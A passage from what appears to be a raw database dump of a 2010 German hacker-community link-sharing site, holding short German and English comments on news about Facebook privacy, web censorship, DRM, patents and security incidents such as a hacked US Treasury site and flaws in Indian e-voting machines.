+</p>http://www.wpsecuritylock.com/breaking-news-wordpress-hacked-with-zettapetta-on-dreamhost/page_shots/2010/05/11/no_page_shot.pngwordpress-hacked-with-zettapetta-on-dreamhost-wp11012010-05-11 10:18:453hack php wordpressheise online - US-Präsident sieht iPad, Xbox und PlayStation skeptischReden kann er schön, der Friedensnobelpreisträger: + +Der Wandel lasse sich nicht aufhalten, aber er lasse sich mit Hilfe von Bildung kanalisieren, gestalten, und man könne sich ihm anpassen.<p>Reden kann er schön, der Friedensnobelpreisträger: +</p> +<p>Der Wandel lasse sich nicht aufhalten, aber er lasse sich mit Hilfe von Bildung kanalisieren, gestalten, und man könne sich ihm anpassen. +</p>http://www.heise.de/newsticker/meldung/US-Praesident-sieht-iPad-Xbox-und-PlayStation-skeptisch-996678.htmlpage_shots/2010/05/11/heise-online-us-prasident-sieht-ipad-xbox-und-p.pngheise-online-us-prasident-sieht-ipad-xbox-und-p11012010-05-11 10:11:183obamaheise online - Facebook verstärkt Lobby-TruppeWhat to do if you are attacked by politics for data collecting? Invest more in lobbying.<p>What to do if you are attacked by politics for data collecting? Invest more in lobbying. +</p>http://www.heise.de/newsticker/meldung/Facebook-verstaerkt-Lobby-Truppe-996867.htmlpage_shots/2010/05/11/heise-online-facebook-verstarkt-lobby-truppe.pngheise-online-facebook-verstarkt-lobby-truppe11012010-05-11 10:08:223facebook lobbymiculog Bündnis 90/Die Grünen in Sachsen fordern einen Umstieg auf GNU/Linux und freie Software — Auswertung der großen FLOSS-AnfrageDie Fraktion von Bündnis 90/Die Grünen im sächsischen Landtag hatte eine große Anfrage zum Einsatz von freier Software in öffentlichen Stellen und Schulen in Sachsen gestellt. Dazu gab es heute eine Pressekonferenz und eine Pressemitteilung, in der sie ihre Auswertung der Antwort auf die Anfrage präsentiert haben. Die gewonnenen Erkenntnisse finde ich durchaus nicht uninteressant. Zum Beispiel hat die große Anfrage ergeben, dass nur 1,7% der Softwarelizenzen in Sachsen FOSS-Lizenzen sind. Ausgerechnet im Serverbereich, in dem freie Betriebssysteme wie GNU/Linux und die BSD-Derivate besonders etabliert sind und in dem ein Umstieg außerdem besonders einfach zu bewerkstelligen wäre, beträgt der Anteil an Freien-Software-Lizenzen nur 0,8%. Zudem fallen dort für nur 16% der im öffentlichen Sektor Sachsens eingesetzten Lizenzen 58% der gesamten Lizenzgebühren an. Insgesamt gibt Sachsen jährlich 9,3 Mio. Euro nur für die Lizenzierung proprietärer Softwareprodukte aus.<p>Die Fraktion von Bündnis 90/Die Grünen im sächsischen Landtag hatte eine große Anfrage zum Einsatz von freier Software in öffentlichen Stellen und Schulen in Sachsen gestellt. Dazu gab es heute eine Pressekonferenz und eine Pressemitteilung, in der sie ihre Auswertung der Antwort auf die Anfrage präsentiert haben. Die gewonnenen Erkenntnisse finde ich durchaus nicht uninteressant. Zum Beispiel hat die große Anfrage ergeben, dass nur 1,7% der Softwarelizenzen in Sachsen FOSS-Lizenzen sind. Ausgerechnet im Serverbereich, in dem freie Betriebssysteme wie GNU/Linux und die BSD-Derivate besonders etabliert sind und in dem ein Umstieg außerdem besonders einfach zu bewerkstelligen wäre, beträgt der Anteil an Freien-Software-Lizenzen nur 0,8%. Zudem fallen dort für nur 16% der im öffentlichen Sektor Sachsens eingesetzten Lizenzen 58% der gesamten Lizenzgebühren an. Insgesamt gibt Sachsen jährlich 9,3 Mio. Euro nur für die Lizenzierung proprietärer Softwareprodukte aus. +</p>http://micuintus.de/2010/05/07/bundnis-90die-grunen-in-sachsen-fordern-einen-umstieg-auf-gnulinux-und-freie-software-%E2%80%94-auswertung-der-grosen-floss-anfrage/page_shots/2010/05/11/miculog-bundnis-90die-grunen-in-sachsen-fordern-e.pngmiculog-bundnis-90die-grunen-in-sachsen-fordern-e11012010-05-11 09:52:313foss saxonySUP MUAZwischending zw. Google Mail und mutt.<p>Zwischending zw. Google Mail und mutt. +</p>http://sup.rubyforge.org/page_shots/2010/05/09/sup-mua.pngsup-mua11012010-05-09 23:53:073muaChinese Rules Said to Threaten Proprietary Information - NYTimes.comChinese Government Requires Disclosure of Encryption Keys Prior to Product Purchase + + +As of May 1, vendors of certain products who wish to continue doing business with government agencies in China are required to disclose specifics of the encryption technologies their products use. The requirements affect 13 technologies, including firewalls, routers, smartcards, database security tools, anti-spam products and intrusion detection products. Before these products can be sold to the Chinese +government, they must be tested and certified by the country's Certification and Accreditation Administration (CNCA). There are concerns that the requirement would allow proprietary information to be +leaked to Chinese competitors and that other countries may be wary of doing business with companies that disclose this sort of information to the Chinese government.<p>Chinese Government Requires Disclosure of Encryption Keys Prior to Product Purchase +</p> +<p>As of May 1, vendors of certain products who wish to continue doing business with government agencies in China are required to disclose specifics of the encryption technologies their products use. The requirements affect 13 technologies, including firewalls, routers, smartcards, database security tools, anti-spam products and intrusion detection products. Before these products can be sold to the Chinese + government, they must be tested and certified by the country's Certification and Accreditation Administration (CNCA). There are concerns that the requirement would allow proprietary information to be + leaked to Chinese competitors and that other countries may be wary of doing business with companies that disclose this sort of information to the Chinese government. +</p>http://www.nytimes.com/2010/05/01/business/global/01yuan.html?src=buslnpage_shots/2010/05/09/chinese-rules-said-to-threaten-proprietary-informa.pngchinese-rules-said-to-threaten-proprietary-informa11012010-05-09 23:48:223china keyescrowHacked US Treasury websites serve visitors malware • The RegisterWebsites operated by the US Treasury Department are redirecting visitors to websites that attempt to install malware on their PCs +Siehe auch [Trojaner vom Umweltbundesamt](http://pentamedia.c3d2.de/submit/2010/03/31/heise-online-webseite-des-umweltbundesamtes-vert/)<p>Websites operated by the US Treasury Department are redirecting visitors to websites that attempt to install malware on their PCs + Siehe auch <a href="http://pentamedia.c3d2.de/submit/2010/03/31/heise-online-webseite-des-umweltbundesamtes-vert/">Trojaner vom Umweltbundesamt</a> +</p>http://www.theregister.co.uk/2010/05/03/treasury_websites_attack/page_shots/2010/05/09/hacked-us-treasury-websites-serve-visitors-malware.pnghacked-us-treasury-websites-serve-visitors-malware11012010-05-09 23:45:113malwareFacebook closes serious security hole - The H Security: News and FeaturesFB let's other users read chat logs. Reference to [Hacker jagen statt Lecks fixen](http://pentamedia.c3d2.de/submit/2010/04/15/heise-online-facebook-lieber-angreifer-jagen-al/).<p>FB let's other users read chat logs. Reference to <a href="http://pentamedia.c3d2.de/submit/2010/04/15/heise-online-facebook-lieber-angreifer-jagen-al/">Hacker jagen statt Lecks fixen</a>. +</p>http://www.h-online.com/security/news/item/Facebook-closes-serious-security-hole-994419.htmlpage_shots/2010/05/09/facebook-closes-serious-security-hole-the-h-secu.pngfacebook-closes-serious-security-hole-the-h-secu11012010-05-09 23:38:313facebookLove Bug 10 years later: I love you - now open this email - Security10 Jahre und kein Stück klüger: at the time the ILOVEYOU Worm, or Love Bug, had infected 45 million computers. <p>10 Jahre und kein Stück klüger: at the time the ILOVEYOU Worm, or Love Bug, had infected 45 million computers. +</p>http://www.thetechherald.com/article.php/201018/5596/Love-Bug-10-years-later-I-love-you-now-open-this-emailpage_shots/2010/05/09/love-bug-10-years-later-i-love-you-now-open-thi.pnglove-bug-10-years-later-i-love-you-now-open-thi11012010-05-09 23:26:023antivirusNew attack bypasses virtually all AV protection • The RegisterResearchers say they've devised a way to bypass protections built in to dozens of the most popular desktop anti-virus products, including those offered by McAfee, Trend Micro, AVG, and BitDefender. + +The method, developed by software security researchers at matousec.com, works by exploiting the driver hooks the anti-virus programs bury deep inside the Windows operating system. In essence, it works by sending them a sample of benign code that passes their security checks and then, before it's executed, swaps it out with a malicious payload.<p>Researchers say they've devised a way to bypass protections built in to dozens of the most popular desktop anti-virus products, including those offered by McAfee, Trend Micro, AVG, and BitDefender. +</p> +<p>The method, developed by software security researchers at matousec.com, works by exploiting the driver hooks the anti-virus programs bury deep inside the Windows operating system. In essence, it works by sending them a sample of benign code that passes their security checks and then, before it's executed, swaps it out with a malicious payload. +</p>http://www.theregister.co.uk/2010/05/07/argument_switch_av_bypass/page_shots/2010/05/09/new-attack-bypasses-virtually-all-av-protection.pngnew-attack-bypasses-virtually-all-av-protection11012010-05-09 23:23:383antivirusRudd retreats on web filter legislation | The AustralianInet Zensur in Australien ausgesetzt.<p>Inet Zensur in Australien ausgesetzt. +</p>http://www.theaustralian.com.au/australian-it/rudd-retreats-on-passing-web-filter-legislation/story-e6frgakx-1225859630452page_shots/2010/05/08/rudd-retreats-on-web-filter-legislation-the-aus.pngrudd-retreats-on-web-filter-legislation-the-aus11012010-05-08 12:46:313censorshipFCC gives Hollywood control over your home theaterFCC controls your tv output<p>FCC controls your tv output +</p>http://arstechnica.com/telecom/news/2010/05/fcc-gives-hollywood-control-over-your-home-theater.ars?utm_source=microblogging&utm_medium=arstch&utm_term=Main%20Account&utm_campaign=microbloggingpage_shots/2010/05/08/fcc-gives-hollywood-control-over-your-home-theater_.pngfcc-gives-hollywood-control-over-your-home-theater11012010-05-08 08:53:363socVorratsdatenspeicherung: Kein Einfluss auf die Aufklärungsrate von Verbrechen - Golem.dehttp://www.golem.de/1005/75002.htmlpage_shots/2010/05/08/vorratsdatenspeicherung-kein-einfluss-auf-die-auf_.pngvorratsdatenspeicherung-kein-einfluss-auf-die-auf11012010-05-08 08:44:403vdsNaked scanner reveals airport screener's tiny penis, sparks fist-fight with fellow officersMiami airport screeners made fun of one of their own after seeing his small penis on their imaging scan. It ended up with small penis beating someone else with a steel baton.<p>Miami airport screeners made fun of one of their own after seeing his small penis on their imaging scan. It ended up with small penis beating someone else with a steel baton. +</p>http://www.miamiherald.com/2010/05/06/1616739/cops-airport-screeners-quarrel.html#ixzz0nCeYw0ckpage_shots/2010/05/07/naked-scanner-reveals-airport-screeners-tiny-peni.pngnaked-scanner-reveals-airport-screeners-tiny-peni131012010-05-07 11:08:553airport body scanner security theaterWir in NRW Das BlogJournalisten und Informanten *anonym* hinter Enthüllungsblog zur Wahl in NRW. + +> …für einen kritischen Journalismus im Netz. In Nordrhein-Westfalen. In Zeiten, da die Erträge der Zeitungs- und Zeitschriftenverlage einbrechen, > hunderte von Journalistenstellen in den Redaktionen gestrichen werden, die Politik mit neuen Mediengesetzen in Verlagen, Rundfunk- und > Fernsehsendern immer stärker Einfluss nimmt, ist es notwendig, unabhängig, klar und parteifern das aufzuschreiben, was wirklich passiert.<p>Journalisten und Informanten <em>anonym</em> hinter Enthüllungsblog zur Wahl in NRW. +</p> +<blockquote><p>…für einen kritischen Journalismus im Netz. In Nordrhein-Westfalen. In Zeiten, da die Erträge der Zeitungs- und Zeitschriftenverlage einbrechen, &gt; hunderte von Journalistenstellen in den Redaktionen gestrichen werden, die Politik mit neuen Mediengesetzen in Verlagen, Rundfunk- und &gt; Fernsehsendern immer stärker Einfluss nimmt, ist es notwendig, unabhängig, klar und parteifern das aufzuschreiben, was wirklich passiert. +</p> +</blockquote>http://www.wir-in-nrw-blog.de/page_shots/2010/05/06/wir-in-nrw-das-blog.pngwir-in-nrw-das-blog11012010-05-06 18:21:553blog journalism nrwvirtual Desktop Patentklage gegen Red Hat und Novell gescheitert Patent Troll bounced w/ *virtual desktop* patent.<p>Patent Troll bounced w/ <em>virtual desktop</em> patent. +</p>http://www.heise.de/newsticker/meldung/Patentklage-gegen-Red-Hat-und-Novell-gescheitert-991964.htmlpage_shots/2010/05/05/heise-online-patentklage-gegen-red-hat-und-novel_.pngheise-online-patentklage-gegen-red-hat-und-novel11012010-05-05 16:32:543patent troll Neues Datenleck bei SchülerVZ : netzpolitik.orgSchülerVZ mal wieder gespidert<p>SchülerVZ mal wieder gespidert +</p>http://www.netzpolitik.org/2010/neues-datenleck-bei-schuelervz/page_shots/2010/05/05/neues-datenleck-bei-schulervz-netzpolitikorg_.pngneues-datenleck-bei-schulervz-netzpolitikorg11012010-05-05 16:27:133dataloss socialnetwork vzGoogleSharing :: A Special Kind Of ProxyGoogle Sharing. Kinda mix for using google search<p>Google Sharing. Kinda mix for using google search +</p>http://www.googlesharing.net/page_shots/2010/05/05/googlesharing-a-special-kind-of-proxy.pnggooglesharing-a-special-kind-of-proxy11012010-05-05 16:17:203googleMATLAB Can't Manipulate 64-Bit IntegersMATLAB, an important package of mathematical software heavily used in industry and academia, has had support for 64-bit machines for several years now. However, the MATLAB developers still haven't gotten around to implementing even basic arithmetic operations for 64-bit integers. Attempting to add, divide, subtract, or multiply two 64-bit integers will result in an error message saying that the corresponding method does not exist. As one commentator put it, 'What is the point of having numerical data types that can't be manipulated? +The free MATLAB clone GNU Octave deals with 64-bit integers just fine.<p>MATLAB, an important package of mathematical software heavily used in industry and academia, has had support for 64-bit machines for several years now. However, the MATLAB developers still haven't gotten around to implementing even basic arithmetic operations for 64-bit integers. Attempting to add, divide, subtract, or multiply two 64-bit integers will result in an error message saying that the corresponding method does not exist. As one commentator put it, 'What is the point of having numerical data types that can't be manipulated? + The free MATLAB clone GNU Octave deals with 64-bit integers just fine. +</p>http://www.walkingrandomly.com/?p=2629page_shots/2010/05/04/matlab-cant-manipulate-64-bit-integers.pngmatlab-cant-manipulate-64-bit-integers131012010-05-04 09:58:33364bit bug open software sourceSchneier on Security: Fun with Secret QuestionsFun with Secret Questions<p>Fun with Secret Questions +</p>http://www.schneier.com/blog/archives/2010/04/fun_with_secret.htmlpage_shots/2010/05/03/schneier-on-security-fun-with-secret-questions.pngschneier-on-security-fun-with-secret-questions11012010-05-03 19:54:443funEU zahlt 300.000 Euro für Pro-Netzsperren-LobbyingEU zahlt 300.000 Euro für Pro-Netzsperren-Lobbying<p>EU zahlt 300.000 Euro für Pro-Netzsperren-Lobbying +</p>http://diepresse.com/home/techscience/internet/562137/index.dopage_shots/2010/05/02/eu-zahlt-300000-euro-fur-pro-netzsperren-lobbying_.pngeu-zahlt-300000-euro-fur-pro-netzsperren-lobbying11012010-05-02 18:13:563censorship eu the Month of PHP SecurityMonth of PHP (In)Security<p>Month of PHP (In)Security +</p>http://php-security.org/page_shots/2010/05/02/the-month-of-php-security.pngthe-month-of-php-security11012010-05-02 18:10:033php Facebooks Eroding Privacy Policy: A Timeline | Electronic Frontier FoundationSince its incorporation just over five years ago, Facebook has undergone a remarkable transformation. When it started, it was a private space for communication with a group of your choice. Soon, it transformed into a platform where much of your information is public by default. Today, it has become a platform where you have no choice but to make certain information public, and this public information may be shared by Facebook with its partner websites and used to target ads.<p>Since its incorporation just over five years ago, Facebook has undergone a remarkable transformation. When it started, it was a private space for communication with a group of your choice. Soon, it transformed into a platform where much of your information is public by default. Today, it has become a platform where you have no choice but to make certain information public, and this public information may be shared by Facebook with its partner websites and used to target ads. +</p>https://www.eff.org/deeplinks/2010/04/facebook-timelinepage_shots/2010/05/02/facebook039s-eroding-privacy-policy-a-timelin_.pngfacebook039s-eroding-privacy-policy-a-timelin11012010-05-02 18:06:383facebook privacyheise online - Sich selbst kompilierende Low Level Virtual MachineLLVM 2.7 released<p>LLVM 2.7 released +</p>http://www.heise.de/newsticker/meldung/Sich-selbst-kompilierende-Low-Level-Virtual-Machine-990292.htmlpage_shots/2010/05/02/heise-online-sich-selbst-kompilierende-low-level.pngheise-online-sich-selbst-kompilierende-low-level11012010-05-02 17:56:573llvmheise online - Indiens E-Voting-Geräte sind angreifbarEin internationales Team von Wahlmaschinen-Experten hat gezeigt, wie sich die in Indien verwendeten Wahlstimmenerfassungsgeräte verhältnismäßig einfach manipulieren lassen. +Eine Angriffsmöglichkeit, die "Dishonest Display Attack", besteht im Austausch der LED-Anzeige durch ein manipuliertes Bauteil, das unmerklich über einen Bluetooth-Funkkontakt von einem Handy aus aktiviert werden kann, um dann einen gewissen Prozentsatz der Stimmen dem gewünschten Kandidaten zuzuschlagen. Ein zweites Angriffsszenario stützt sich auf ein kleines Hilfsgerät aus handelsüblichen Bauteilen, das leicht in eine Hemdtasche passt und einer Chipzange ähnelt: Klemmt ein Angreifer es irgendwann im Zeitraum zwischen dem Wahltag und der in Indien Tage oder Wochen später stattfindenden Auszählung kurz an die Kontakte des Speicherchips, lässt sich damit der Speicherinhalt verändern.<p>Ein internationales Team von Wahlmaschinen-Experten hat gezeigt, wie sich die in Indien verwendeten Wahlstimmenerfassungsgeräte verhältnismäßig einfach manipulieren lassen. + Eine Angriffsmöglichkeit, die "Dishonest Display Attack", besteht im Austausch der LED-Anzeige durch ein manipuliertes Bauteil, das unmerklich über einen Bluetooth-Funkkontakt von einem Handy aus aktiviert werden kann, um dann einen gewissen Prozentsatz der Stimmen dem gewünschten Kandidaten zuzuschlagen. Ein zweites Angriffsszenario stützt sich auf ein kleines Hilfsgerät aus handelsüblichen Bauteilen, das leicht in eine Hemdtasche passt und einer Chipzange ähnelt: Klemmt ein Angreifer es irgendwann im Zeitraum zwischen dem Wahltag und der in Indien Tage oder Wochen später stattfindenden Auszählung kurz an die Kontakte des Speicherchips, lässt sich damit der Speicherinhalt verändern. +</p>http://www.heise.de/newsticker/meldung/Indiens-E-Voting-Geraete-sind-angreifbar-990724.htmlpage_shots/2010/05/02/heise-online-indiens-e-voting-gerate-sind-angrei.pngheise-online-indiens-e-voting-gerate-sind-angrei11012010-05-02 17:54:353voting wahlcomputerMusic industry spokesman loves child porn"Child pornography is great," the speaker at the podium declared enthusiastically. "It is great because politicians understand child pornography. By playing that card, we can get them to act, and start blocking sites. And once they have done that, we can get them to start blocking file sharing sites". +The venue was a seminar organized by the American Chamber of Commerce in Stockholm on May 27, 2007, under the title "Sweden -- A Safe Haven for Pirates?". The speaker was Johan Schlüter from the Danish Anti-Piracy Group, a lobby organization for the music and film industry associations, like IFPI and others... +"One day we will have a giant filter that we develop in close cooperation with IFPI and MPA. We continuously monitor the child porn on the net, to show the politicians that filtering works. Child porn is an issue they understand," Johan Schlüter said with a grin, his whole being radiating pride and enthusiasm from the podium. <p>"Child pornography is great," the speaker at the podium declared enthusiastically. "It is great because politicians understand child pornography. By playing that card, we can get them to act, and start blocking sites. And once they have done that, we can get them to start blocking file sharing sites". + The venue was a seminar organized by the American Chamber of Commerce in Stockholm on May 27, 2007, under the title "Sweden -- A Safe Haven for Pirates?". The speaker was Johan Schlüter from the Danish Anti-Piracy Group, a lobby organization for the music and film industry associations, like IFPI and others... + "One day we will have a giant filter that we develop in close cooperation with IFPI and MPA. We continuously monitor the child porn on the net, to show the politicians that filtering works. Child porn is an issue they understand," Johan Schlüter said with a grin, his whole being radiating pride and enthusiasm from the podium. +</p>http://christianengstrom.wordpress.com/2010/04/27/ifpis-child-porn-strategy/page_shots/2010/04/29/music-industry-spokesman-loves-child-porn.pngmusic-industry-spokesman-loves-child-porn131012010-04-29 18:29:363censorship, child porn, copyright, digital, ifpi, mpaa, net, neutrality, pirate, riaa, rightsno more floppySony stellt Anfang 2011 die Floppy Diskproduktion ein.<p>Sony stellt Anfang 2011 die Floppy Diskproduktion ein. +</p>http://www.realitynews.biz/359/sony-stop-selling-floppy-disks/page_shots/2010/04/26/no-more-floppy.pngno-more-floppy11012010-04-26 23:47:172floppy sonyReconstructing Users' Web Histories From Personalized Search ResultsPersonalization is a key part of Internet search, providing more relevant results and gaining loyal customers in the process. But new research highlights the privacy risks that this kind of personalization can bring. A team of European researchers, working with a researcher from the University of California, Irvine, found that they were able to hijack Google's personalized search suggestions to reconstruct users' Web search histories. Google has plugged most of the holes identified in the research, but the researchers say that other personalized services are likely to have similar vulnerabilities.<p>Personalization is a key part of Internet search, providing more relevant results and gaining loyal customers in the process. But new research highlights the privacy risks that this kind of personalization can bring. A team of European researchers, working with a researcher from the University of California, Irvine, found that they were able to hijack Google's personalized search suggestions to reconstruct users' Web search histories. Google has plugged most of the holes identified in the research, but the researchers say that other personalized services are likely to have similar vulnerabilities. +</p>http://www.technologyreview.com/web/25159/?a=fpage_shots/2010/04/26/reconstructing-users-web-histories-from-personali.pngreconstructing-users-web-histories-from-personali131012010-04-26 17:56:112google online privacy searchgPodder.net Cooler soon-to-be-better-than-iTunes-and-OSS Podcastcatcher<p>Cooler soon-to-be-better-than-iTunes-and-OSS Podcastcatcher +</p>http://gpodder.net/page_shots/2010/04/26/gpoddernet.pnggpoddernet51012010-04-26 14:36:052heise online - Verizon: Full Disclosure nützt nur selbstverliebten &quot;Pimps&quot;Nachdem FB's Ex-FBI Typ alle FD-Hacker verhaften will, mag Verizon diese nun als "Narcissistic Vulnerability Pimp und Criminal" bezeichnen. + + +<p>Nachdem FB's Ex-FBI Typ alle FD-Hacker verhaften will, mag Verizon diese nun als "Narcissistic Vulnerability Pimp und Criminal" bezeichnen. +</p>http://www.heise.de/newsticker/meldung/Verizon-Full-Disclosure-nuetzt-nur-selbstverliebten-Pimps-986197.htmlpage_shots/2010/04/26/heise-online-verizon-full-disclosure-nutzt-nur.pngheise-online-verizon-full-disclosure-nutzt-nur11012010-04-26 14:07:342fulldisclosure hacking verizonNina Paley passes Netflix DRM and thousands of dollarsI've been the "change I want to see" in regards to copyright monopolies. People told me I'd lose everything by copylefting Sita, including all hope of professional distribution. But in fact, some professional distributors became willing to distribute Sita without claiming monopolies over it, and we're all fine. +This mirrors my experience with Audible and the Kindle, where I, as the copyright holder and creator, was not allowed to offer my work without DRM and/or a restrictive license-agreement -- I wasn't even allowed to add something to the text or audio saying, "I release you from the license agreement you've clicked through." <p>I've been the "change I want to see" in regards to copyright monopolies. People told me I'd lose everything by copylefting Sita, including all hope of professional distribution. But in fact, some professional distributors became willing to distribute Sita without claiming monopolies over it, and we're all fine. + This mirrors my experience with Audible and the Kindle, where I, as the copyright holder and creator, was not allowed to offer my work without DRM and/or a restrictive license-agreement -- I wasn't even allowed to add something to the text or audio saying, "I release you from the license agreement you've clicked through." +</p>http://blog.ninapaley.com/2010/04/23/turning-down-netflix/page_shots/2010/04/26/no_page_shot.pngnina-paley-passes-netflix-drm-and-thousands-of-dol131012010-04-26 09:41:242copyleft, copyright, digital media, drm, netflixFacebook Retroactively Makes More User Data PublicIn yet another backtrack from their privacy policy, Facebook has decided to retroactively move more information into the public, indexable part of profiles. The new profile parts made public are: a list of things users have become 'fans' of (now renamed to 'likes'), their education and work histories, and what they list under 'interests.' Apparently there is neither any opt-out nor even notice to users, despite the fact that some of this information was entered by users at a time when Facebook's privacy policy explicitly promised that it wouldn't be part of the public profile.<p>In yet another backtrack from their privacy policy, Facebook has decided to retroactively move more information into the public, indexable part of profiles. The new profile parts made public are: a list of things users have become 'fans' of (now renamed to 'likes'), their education and work histories, and what they list under 'interests.' Apparently there is neither any opt-out nor even notice to users, despite the fact that some of this information was entered by users at a time when Facebook's privacy policy explicitly promised that it wouldn't be part of the public profile. +</p>http://www.eff.org/deeplinks/2010/04/facebook-further-reduces-control-over-personal-informationpage_shots/2010/04/24/facebook-retroactively-makes-more-user-data-public.pngfacebook-retroactively-makes-more-user-data-public131012010-04-24 18:44:422eff, facebook, online, privacy, rights, social networkGerman appeal court upholds Microsoft FAT patent - The H Open Source: News and FeaturesFAT Patent doch in .de durchgesetzt<p>FAT Patent doch in .de durchgesetzt +</p>http://www.h-online.com/open/news/item/German-appeal-court-upholds-Microsoft-FAT-patent-985550.htmlpage_shots/2010/04/24/german-appeal-court-upholds-microsoft-fat-patent.pnggerman-appeal-court-upholds-microsoft-fat-patent11012010-04-24 08:33:392fat microsoft patent"Universität sperrt iPads wegen fehlerhaftem DHCP"Titel sagt wohl alles ;)<p>Titel sagt wohl alles ;) +</p>http://www.mactechnews.de/news/index.html?id=146579page_shots/2010/04/23/universitat-sperrt-ipads-wegen-fehlerhaftem-dhcp.pnguniversitat-sperrt-ipads-wegen-fehlerhaftem-dhcp11012010-04-21 14:17:362apple dhcp ipadThe keys to my heart are on my footA Microsoft researcher has suggested tattooing passwords on patients with pacemakers and other implanted medical devices to ensure the remotely-controlled gadgets can be accessed during emergencies.<p>A Microsoft researcher has suggested tattooing passwords on patients with pacemakers and other implanted medical devices to ensure the remotely-controlled gadgets can be accessed during emergencies. +</p>http://www.theregister.co.uk/2010/04/16/pacemaker_security_tattoo/page_shots/2010/04/20/the-keys-to-my-heart-are-on-my-foot.pngthe-keys-to-my-heart-are-on-my-foot131012010-04-20 20:02:262device embedded medical microsoft securitySchool secretly snapped 1000s of students at homeA suburban Philadelphia school district secretly captured thousands of images of students in their homes, sometimes as they slept or were partially undressed, according to documents filed in federal court. + +Using a system to track lost or stolen laptops, officials from the Lower Merion School District also covertly surveilled students as they used their school-issued Macs, logging online chats and taking screenshots of websites they visited, according to the documents.<p>A suburban Philadelphia school district secretly captured thousands of images of students in their homes, sometimes as they slept or were partially undressed, according to documents filed in federal court. +</p> +<p>Using a system to track lost or stolen laptops, officials from the Lower Merion School District also covertly surveilled students as they used their school-issued Macs, logging online chats and taking screenshots of websites they visited, according to the documents. +</p>http://www.theregister.co.uk/2010/04/16/secret_student_pics/page_shots/2010/04/20/school-secretly-snapped-1000s-of-students-at-home.pngschool-secretly-snapped-1000s-of-students-at-home131012010-04-20 20:00:162freedom laptop mac surveillancePrinting from an iPadHack of the month<p>Hack of the month +</p>http://www.feld.com/wp/archives/2010/04/printing-from-an-ipad.htmlpage_shots/2010/04/20/printing-from-an-ipad.pngprinting-from-an-ipad11012010-04-20 15:43:392apple ipad Innenminister stellt löschen statt sperren in Frage : netzpolitik.org de Maiziere weiß nicht, wie er Media Control wieder herstellen soll und findet Internetsperren ganz wichtig. + +*** +Auch das Thema Kinderpornographie im Internet war Thema im Videochat von tagesschau.de. Der Bundesinnenminister stellte klar, das es bei der Sperrung und Löschung von Bildern kein “entweder oder” geben solle. “Das Löschen der Seiten ist keine Lösung – sondern nur temporäres Verbannen von der Seite”. Ob es ihm vorrangig um die Sperrung pornographischer Bilder oder um die Netzfreiheit gehen würde, entgegnete der Minister: “So scharf stellt sich die Alternative in der Regel nicht. Deswegen glaube ich das es einen Weg gibt, Kinderpornografie zu bekämpfen ohne die Freiheit des Internets aufzugeben.” +*** + +[Offener Brief](http://ccc.de/de/updates/2010/offener-brief-leuti-schnarri) dagegen.<p> de Maiziere weiß nicht, wie er Media Control wieder herstellen soll und findet Internetsperren ganz wichtig. +</p> +<p><hr /> +Auch das Thema Kinderpornographie im Internet war Thema im Videochat von tagesschau.de. Der Bundesinnenminister stellte klar, das es bei der Sperrung und Löschung von Bildern kein “entweder oder” geben solle. “Das Löschen der Seiten ist keine Lösung – sondern nur temporäres Verbannen von der Seite”. Ob es ihm vorrangig um die Sperrung pornographischer Bilder oder um die Netzfreiheit gehen würde, entgegnete der Minister: “So scharf stellt sich die Alternative in der Regel nicht. Deswegen glaube ich das es einen Weg gibt, Kinderpornografie zu bekämpfen ohne die Freiheit des Internets aufzugeben.” +<hr /> +</p> +<p><a href="http://ccc.de/de/updates/2010/offener-brief-leuti-schnarri">Offener Brief</a> dagegen. +</p>http://www.netzpolitik.org/2010/innenminister-stellt-loeschen-statt-sperren-in-frage/page_shots/2010/04/20/innenminister-stellt-8220loschen-statt-sperre__.pnginnenminister-stellt-8220loschen-statt-sperre11012010-04-20 09:41:592internetsperren Hitler Is Very Upset That Constantin Film Is Taking Down Hitler Parodies Constantin Film mahnt "Der Untergang" Parodien ab. +Constantin Film is the German film production and distribution company behind the film Downfall (Der Untergang in German). The uploader of one of the Hilter parodies notes in the comments of his video that, “Constatin Films has filed a copyright infringement claim against this video, right before it was about to reach 500,000 views! Even though it falls? under Fair Use, I suspect this video will be taken down soon. Sad face.“ + +Read more: http://techcrunch.com/2010/04/19/hitler-parody-takedown/#ixzz0lcfUw0Up<p>Constantin Film mahnt "Der Untergang" Parodien ab. + Constantin Film is the German film production and distribution company behind the film Downfall (Der Untergang in German). The uploader of one of the Hilter parodies notes in the comments of his video that, “Constatin Films has filed a copyright infringement claim against this video, right before it was about to reach 500,000 views! Even though it falls? under Fair Use, I suspect this video will be taken down soon. Sad face.“ +</p> +<p>Read more: http://techcrunch.com/2010/04/19/hitler-parody-takedown/#ixzz0lcfUw0Up +</p>http://techcrunch.com/2010/04/19/hitler-parody-takedown/page_shots/2010/04/20/hitler-is-very-upset-that-constantin-film-is-tak.pnghitler-is-very-upset-that-constantin-film-is-tak11012010-04-20 09:21:542constantin parodyThis Is Apple's Next iPhone - Iphone 4 - GizmodoRiecht ganz stark nach einem **Marketing-PR-Ding**. +Awesome! Nächste iPhone-Version in Bar verloren. +Grund war [Deutsches Bier](http://gizmodo.com/5520438/how-apple-lost-the-next-iphone)<p>Riecht ganz stark nach einem <strong>Marketing-PR-Ding</strong>. + Awesome! Nächste iPhone-Version in Bar verloren. + Grund war <a href="http://gizmodo.com/5520438/how-apple-lost-the-next-iphone">Deutsches Bier</a> +</p>http://gizmodo.com/5520164/this-is-apples-next-iphonepage_shots/2010/04/20/this-is-apples-next-iphone-iphone-4-gizmodo___.pngthis-is-apples-next-iphone-iphone-4-gizmodo11012010-04-19 23:42:442apple iphone marketingPalm Pwned: Researchers Hack WebOS With Text Messages | threatpostDas WebOS mittels SMS geowned. History repeats itself.<p>Das WebOS mittels SMS geowned. History repeats itself. +</p>http://threatpost.com/en_us/blogs/palm-pwned-researchers-hack-webos-text-messages-041910page_shots/2010/04/19/palm-pwned-researchers-hack-webos-with-text-messa.pngpalm-pwned-researchers-hack-webos-with-text-messa11012010-04-19 23:36:362palm sms webos How Dirty MP3 Files Are A Back Door Into Cloud DRM Songs sollen per digitalem Wasserzeichen und Online-Streaming kontrolliert werden + +Während sich Online-Stores und Musik-Labels die vergangenen Jahre schrittweise darauf geeinigt haben, im Internet vertriebene Download-Songs ohne Kopierschutz auszuliefern, um Kundenwünschen entgegen zu kommen, scheint die Musikindustrie künftig wieder mehr Kontrolle über ihre Werke haben zu wollen. + +Online-DRM + +siehe auch der [standard] (http://derstandard.at/1269449159003/Bericht-Musikindustrie-plant-Comeback-des-Kopierschutzes)<p>Songs sollen per digitalem Wasserzeichen und Online-Streaming kontrolliert werden +</p> +<p>Während sich Online-Stores und Musik-Labels die 